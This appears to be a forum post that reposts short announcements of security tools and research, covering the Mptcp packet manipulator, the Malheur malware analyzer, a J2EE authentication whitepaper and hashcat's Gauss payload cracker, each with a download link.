What gossip about you? Do we have another celebrity? I haven't heard anything about you since... the thing before Defcamp. As for tex, people talk a lot without knowing; I don't know much either, but I refrain from making various comments.
-
Mptcp Packet Manipulator 1.9.0

Authored by Khun | Site hexcodes.org

Mptcp is a tool for manipulation of raw packets that allows a large number of options. Its primary purpose is to diagnose and test several scenarios involving the use of various types of TCP/IP packets. It is able to send certain types of packets to any specific target and manipulate various fields at runtime. These fields can be modified in the packet structure, such as the Source/Destination IP address and Source/Destination MAC address.

Changes: Added support for Display Packet Content (tcpdump style). More hard compiler optimizations. Full support for Darwin OS. Various other additions and improvements.

Download: http://packetstormsecurity.org/files/download/119132/mptcp-1.9.0.tar.gz

Source: Mptcp Packet Manipulator 1.9.0 - Packet Storm
-
Malheur Malware Analyzer 0.5.3

Authored by Konrad Rieck | Site mlsec.org

Malheur is a tool for automatic analysis of program behavior recorded from malicious software (malware). It is designed to support the regular analysis of malicious software and the development of detection and defense measures. It allows for identifying novel classes of malware with similar behavior and assigning unknown malware to discovered classes. It can be applied to recorded program behavior of various formats as long as monitored events are separated by delimiter symbols, e.g. as in reports generated by the popular malware sandboxes CWSandbox, Anubis, Norman Sandbox, and Joebox.

Changes: The tool's persistent state is stored in the local state directory for better maintenance. Several minor bugs have been fixed.

Download: http://packetstormsecurity.org/files/download/119128/malheur-0.5.3.tar.gz

Source: Malheur Malware Analyzer 0.5.3 - Packet Storm
-
Insecure Authentication Control In J2EE

Authored by Ashish Rao

This is a whitepaper discussing insecure authentication control in J2EE implemented using sendRedirect().

Download: http://packetstormsecurity.org/files/download/119129/insecureauth-j2ee.pdf

Source: Insecure Authentication Control In J2EE - Packet Storm
-
Hashcat's GPU-accelerated Gauss encryption cracker

GReAT
Kaspersky Lab Expert
Posted December 28, 10:45 GMT

2012 was a year full of major security incidents: Flame, Shamoon, Flashback, Wiper, Gauss, and so on. As we are about to turn the page, many unsolved mysteries still remain. Perhaps the most interesting unsolved mysteries are related to the Gauss Trojan: the Palida Narrow font and the unknown encrypted payload. Previously, we've published a blogpost about the encrypted payload hoping that the crypto community will take on the challenge and break the encryption scheme to reveal the true purpose of the mysterious malware.

Yesterday, Jens 'atom' Steube, who is best known as the author of '(ocl)hashcat' - a GPU accelerated password recovery tool, released his Gauss cracker as open source software under a GPL license. This is a major breakthrough towards solving the Gauss encryption scheme because of the speeds it achieves: 489k c/s on an AMD Radeon HD 7970 card. If you're wondering, this is over 30 times faster than an AMD FX 8120 CPU.

You can download the sources and Linux binary from Jens' 'hashcat' page.

Happy New (Cracking) Year!

Download: https://hashcat.net/oclGaussCrack/

Source: Hashcat's GPU-accelerated Gauss encryption cracker - Securelist